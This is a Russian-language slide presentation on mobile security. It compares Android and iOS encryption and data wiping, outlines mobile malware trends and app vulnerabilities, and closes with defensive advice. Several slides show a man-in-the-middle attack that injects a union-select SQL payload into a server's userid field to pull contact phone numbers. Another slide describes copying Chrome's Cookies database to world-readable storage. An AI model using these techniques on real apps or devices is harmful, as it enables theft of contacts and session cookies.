6. Шифрование
Android
• Full Disk Encryption с версии 3.0
• Нет стандартного API для шифрования данных
iOS
• Full Disk Encryption, начиная с iPhone 3GS
• Аппаратное шифрование
• Стандартное API для сторонних приложений
7. Удаление данных
Android
• Outlook
• Сторонние приложения (Антивирусы и т.п.)
• Программный вайп
iOS
• Outlook
• Mobile Device Management (MDM)
• Железный вайп
9. Malware
Общее количество экземпляров мобильного вредоносного ПО
http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q2-2012.pdf
10. Malware
Что дальше?
• рост числа троянов для мобильных платформ
• эксплойты, локальные и удаленные
• две основные цели: fraud и конфиденциальные данные
• максимальная скрытность в системе
• минимальные подозрения у пользователя
11. Уязвимости приложений
Небезопасное хранение данных
Небезопасная передача данных
MiTM атаки
Специфичные для мобильных платформ уязвимости
12. MITM+SQLI
POST https://server.com/ HTTP/1.1
action=login&
login=test_user&
password=S0mEs3cur3_pass
13. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid>1234</userid>
</xml>
14. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid>1234</userid>
</xml>
SELECT lastUpdate FROM profile WHERE userID=‘1234’;
15. MITM+SQLI
POST https://server.com/ HTTP/1.1
lastupdate=1345914732
16. MITM+SQLI
POST https://server.com/ HTTP/1.1
action=login&
login=test_user&
password=S0mEs3cur3_pass
17. MITM+SQLI
200 OK
<xml>
<token>blablablabla</token>
<userid> 1234’ and 1=0 union select phone from Contacts--
</userid>
</xml>
18. MITM+SQLI
<userid> 1234’ and 1=0 union select phone from Contacts--
</userid>
SELECT lastUpdate FROM profile WHERE userID=‘1234’
AND 1=0 UNION SELECT phone FROM Сontacts– ‘;
19. MITM+SQLI
POST https://server.com/ HTTP/1.1
lastupdate=+71234567890
20. Chrome for Android
http://, https://, file://
Cookies и История браузера в SQLITE БД
Автоматическая загрузка бинарных файлов
Файлы браузера не доступны стороннему ПО
file:///data/data/com.android.chrome/databases/Cookies
Файл Cookies будет скопирован в папку /sdcard/ и
доступен на чтением всем.
21. Выводы
Сложный пароль для PIN-to-unlock
Полное шифрование системы
Антивирусы и механизмы удаления данных
Устанавливать только доверенное ПО
BYOD – плохо!